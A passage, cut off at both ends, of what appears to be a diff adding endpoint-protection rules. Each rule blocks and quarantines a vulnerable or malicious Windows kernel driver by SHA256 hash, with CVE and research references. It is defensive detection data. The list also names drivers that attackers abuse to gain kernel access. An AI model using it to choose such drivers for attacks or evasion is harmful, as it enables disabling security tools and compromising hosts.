true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c825a47817399e988912bb75106befaefae0babc0743a7e32b46f17469c78cad", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4484d04f-e24e-5e1f-85e6-b60c2c1a3479", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619829Z", + "creation_date": "2026-03-23T11:45:29.619832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619839Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85c5e66f38152d17d5b580126b3348579263bbc8fd22e5417c0090fd75a330ac", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44856600-f87f-5fb5-8dcb-4feaffb7a739", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494638Z", + "creation_date": "2026-03-23T11:45:31.494640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494645Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25c22c2f8a531085ec80c2da27bd1747ff7b7aad4918b59828607edfb9f44802", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4491e865-c96f-55b6-a95f-7c0dc7c11bb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145930Z", + "creation_date": "2026-03-23T11:45:32.145932Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145937Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2559a34af1cc5cd65bfd4334d053294046e05d833937e3b6fbfe7ddd381d0963", + "comment": "Malicious Kernel Driver (aka driver_d9f15d91.sys) [https://www.loldrivers.io/drivers/576bb95a-f15e-4a0d-bcee-08791e1504e2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44935acf-c6ff-55a8-9f5f-03d963e5c209", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495529Z", + "creation_date": "2026-03-23T11:45:31.495531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee5d373e156cff39edeb97f3c5c18ff312d2157d856cd2f594af1d7cf4e61749", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "449fb1fe-4b65-5e77-b233-a152fad8466b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494222Z", + "creation_date": "2026-03-23T11:45:31.494225Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2e17957495b1fd61690f4e580a3038c5dc773d86567034669d3fe0cdc35653a", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44a43175-f9c7-5fea-90dd-0ba302eb4b6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829681Z", + "creation_date": "2026-03-23T11:45:31.829684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bbd93e1a032616ad55c4f8a92e78a849e424eb6d4cd945d794fbd39a234ce58", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44bc1f4e-ebf3-51d5-b086-d7b2b200afa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822817Z", + "creation_date": "2026-03-23T11:45:31.822820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822829Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cba4367e05c7155638ee729e00f6cb42d35088316c62fa9cfea18a2b1af4d04", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44c3bbc6-6281-5ee9-b4d5-d7243f2480ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615220Z", + "creation_date": "2026-03-23T11:45:29.615222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7334c46a55acf8bb18435ab60ed9b89f2c1ab31587ef052730358efc32fddb62", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] 
[http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44c56f4d-5b4f-5634-ad0c-5f6667c902c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488431Z", + "creation_date": "2026-03-23T11:45:31.488433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c57561416c054c66190056ca3a8633d6123d51f3e8c9cd032545938326f22cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44e44eec-6c72-54f4-8633-bfc852f8dad5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968740Z", + "creation_date": "2026-03-23T11:45:29.968742Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968748Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb8aef4049f78c3ca1c0808b95a8d3f975e00e1b570b890d1d5915e1e804574e", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44ecf641-4932-55d7-bbe2-48e84ed5f4a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817768Z", + "creation_date": "2026-03-23T11:45:30.817771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8e047a7c96a94eb7cf0416253eca48fa7ba66914b684ee75e81651c83c7ac30", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45014412-5e9f-5477-8bf9-7c2fd94ffc25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156380Z", + "creation_date": "2026-03-23T11:45:31.156382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ded7a01c322d1a61683b93b9f2aec35c2a2d98f7bb4aad2ffa9ba6138d7276cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4505253a-eb61-5ab1-be9c-0ed335a9d6bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492853Z", + "creation_date": "2026-03-23T11:45:31.492856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492865Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65181921bd04e45ef68257afad11f3f22a864d80e7fea5dcf74f8e7cf40d59e2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45076210-e771-5434-8038-ad17af824194", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142541Z", + "creation_date": "2026-03-23T11:45:31.142543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9d8ba7a075bbf1085f34d64dc9225b85be30f6a61b297203db23c484878d903", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "450e0efd-0e8d-5b5a-a9a2-8dcc0e95993a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834786Z", + "creation_date": "2026-03-23T11:45:30.834789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a654e7f84e3589acb475f3962c2cf00f2f15e523ec931b11b57bdeb292981255", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "451aa41f-6b39-5662-a56b-c5619061b098", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160439Z", + "creation_date": "2026-03-23T11:45:31.160441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"54e230432e4bd8adaff7afdb4f3a0118b348b81697998701fee1018ba180e554", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45212cfa-e44f-5ace-ae21-f7d5edfd09af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477112Z", + "creation_date": "2026-03-23T11:45:30.477115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f15fd9b81092a98fabcc4ac95e45cec2d9ff3874d2e3faac482f3e86edad441", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4539174d-5cf9-53df-95fc-167ea0515560", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979533Z", + "creation_date": "2026-03-23T11:45:29.979535Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "453ee8e1-bdb8-5a4f-867a-3de858e9a833", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456839Z", + "creation_date": "2026-03-23T11:45:30.456842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "45586c36-5229-5c5f-8787-694a0834f01b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478484Z", + "creation_date": "2026-03-23T11:45:30.478487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d1bd2235d422954506b1bdb3070d9d8bada3fb7f9e4f658036031294b3a95df", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4562f796-91e0-5602-a4d0-30da2dbb8fc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968185Z", + "creation_date": "2026-03-23T11:45:29.968187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.968192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4565b1bc-7f92-58aa-803e-e954df29e81c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481823Z", + "creation_date": "2026-03-23T11:45:30.481825Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c79e5196c2f51d2ab16e40b9d5725a8bf6ae0aaa70b02377aedc0f4e93ca37f", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4569b94a-8fca-5edd-9cbf-9c0626eafc44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972266Z", + "creation_date": "2026-03-23T11:45:29.972268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46ec6310c5ea5e289299d40f5ecca82b9c722ffc766dfd08f36dc88835e63567", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "456cec38-b53f-5ae3-a145-2908ebfdd8f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819812Z", + "creation_date": "2026-03-23T11:45:30.819814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
